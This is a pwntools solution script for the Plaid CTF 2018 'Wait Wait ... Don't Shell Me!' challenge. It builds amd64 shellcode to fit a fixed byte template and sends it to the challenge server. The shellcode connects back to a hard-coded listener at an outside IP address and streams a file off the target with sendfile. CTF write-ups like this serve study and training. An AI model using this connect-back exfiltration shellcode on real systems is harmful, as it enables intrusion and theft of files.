Solution to the "Wait Wait ... Don't Shell Me!" challenge from Plaid CTF 2018. The submitted shellcode has to match a fixed byte template (only the immediates are free); it opens a TCP connection back to a hard-coded listener and streams a file from the target over that socket with sendfile(2).
from pwn import * | |
context.arch = 'amd64'

# Byte template the challenge enforces on submitted shellcode.  Every fixed
# byte must match exactly; '__' marks a position whose value is ours to pick
# (the immediates of the mov/add instructions).  The wildcard is stored as
# 0xcc so that assemble() can spot it by plain byte comparison -- this is only
# safe because none of the fixed bytes in the template is 0xcc.
_TEMPLATE_HEX = '''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba
__ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __
__ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __
__ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __
bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89
__ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __
__ 0f 05 58'''
# Strip the layout whitespace, substitute the wildcard marker, then hex-decode
# (Python 2 str codec -- this file is Python 2 throughout; CODES is a raw
# byte string).
CODES = ''.join(_TEMPLATE_HEX.split()).replace('__', 'cc').decode('hex')
# Debug aid: disassemble the template with the wildcards shown as NOPs.
#print disasm(CODES.replace('\xcc','\x90'),offset=False, byte=False)
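def _fill_template(template, codes):
    """Match assembled bytes against the challenge template, collecting the free bytes.

    ``template`` is a byte string in which 0xcc marks a wildcard position;
    ``codes`` is the assembled shellcode.  Returns the list of integer byte
    values found at the wildcard positions, in order -- these are the only
    bytes the challenge lets us choose, and they are what gets submitted.

    Raises ValueError when the lengths differ or when a fixed template byte
    does not equal the assembled byte at the same offset.  This replaces the
    original ``assert`` checks: an assert is stripped under ``python -O``,
    which would silently submit shellcode that cannot match the template.
    """
    # bytearray indexing yields ints on both Python 2 (str) and 3 (bytes).
    want = bytearray(template)
    have = bytearray(codes)
    if len(have) != len(want):
        raise ValueError('assembled %d bytes, template has %d'
                         % (len(have), len(want)))
    free = []
    for off, (t, b) in enumerate(zip(want, have)):
        if t == 0xcc:
            free.append(b)
        elif t != b:
            raise ValueError('byte %#04x at offset %d does not match template '
                             'byte %#04x' % (b, off, t))
    return free


def assemble(code):
    """Assemble ``code`` (pwntools ``asm``) and return its free bytes as ints.

    The assembled shellcode must encode to exactly the template in the
    module-level ``CODES``: same length, same fixed bytes.  Only the bytes at
    the template's wildcard positions are returned.  The disassembly and the
    two lengths are printed as a debugging aid, as in the original script.

    Raises ValueError if the assembled bytes do not fit the template (see
    ``_fill_template``).
    """
    codes = asm(code)
    print(disasm(codes))
    print('%d %d' % (len(codes), len(CODES)))
    return _fill_template(CODES, codes)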
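# Offset added to the hard-coded address in the shellcode.  The commented-out
# loop brute-forced it in 0x100 steps; the final run uses 0.
#for x in xrange(0, 0x100000, 0x100):
x = 0
if 1:
    r = None
    try:
        r = remote('wwdsm.chal.pwning.xxx', 6615, level='error')
        print(r.recv())
        # Shellcode constrained by the CODES template: each instruction must
        # encode to the template's fixed opcode bytes, so only the immediates
        # are free.  Some registers are derived arithmetically
        # (edi = 2 - SYS_socket + eax, esi = 3 - edi, edx = 0 & esi) because
        # the template pins the `add edi,eax` / `sub esi,edi` / `and edx,esi`
        # bytes (01 c7 / 29 fe / 21 f2), not for obfuscation.
        #
        # What it does on the target:
        #   socket(AF_INET=2, SOCK_STREAM=1, 0)
        #   connect(0, &sockaddr_in, 0x10)    -- sockaddr is the pushed movabs
        #   open(0x400cb8 + x, O_RDONLY, 0)   -- eax is 0 after a successful
        #                                        connect, so `add eax,SYS_open`
        #                                        leaves exactly SYS_open
        #   sendfile(0, fd, NULL, 0x999)      -- rdx is still 0 from the open
        #                                        args; streams the file out
        #
        # Assumptions nothing here verifies:
        #   * The fd returned by socket() is never saved; 0 is hard-coded as
        #     the socket for connect() and sendfile(), so this only works if
        #     socket() returned 0 -- i.e. fd 0 was closed on the challenge
        #     side before the shellcode ran.
        #   * The movabs immediate is a little-endian sockaddr_in: family
        #     0x0002 (AF_INET), port bytes 04 d2 (1234), address bytes
        #     12 dd 4a 86 (18.221.74.134).  That was the author's 2018
        #     catcher; rebuild the constant for any other listener.
        #   * 0x400cb8 is presumably the address of a path string inside the
        #     challenge binary -- not visible here, verify against the target.
        code = '''
mov eax, SYS_socket
mov edi, -SYS_socket+2
mov esi, 3
mov edx, 0
add edi,eax
sub esi,edi
and edx,esi
syscall
movabs rax,0x864add12d2040002 /*ip port AF_INET*/
push rax
mov eax,SYS_connect
mov edx,0x10
mov edi,0
mov rsi,rsp
syscall
mov esi,0
mov edi,0x400cb8+{}
mov edx,0
add eax,SYS_open
syscall
mov esi, eax
mov eax, SYS_sendfile
mov edi,0
mov r10d,0x999
syscall
pop rax
'''.format(x)
        # Only the template's free bytes are submitted, one hex byte per line.
        free_bytes = assemble(code)
        payload = '\n'.join('%02x' % b for b in free_bytes)
        r.sendline(payload)
        print(r.recv())
        print(r.recvuntil('won!\n'))
        print(0)
        #r.sendline('asdf')
        # Drain whatever else the service sends (the file itself arrives on
        # our own listener, not on this connection).
        print(r.recv())
        print(r.recv())
        print(r.recv())
        print(r.recv())
    except KeyboardInterrupt:
        pass
    except Exception as e:
        # Best-effort by design: a failed attempt is reported, not fatal, so
        # the brute-force loop above can keep going when re-enabled.
        print(e)
    finally:
        print(x)
        # The original never closed the connection; release it explicitly.
        if r is not None:
            r.close()
# Source: http://push0ebp.tistory.com/31 [Hacks]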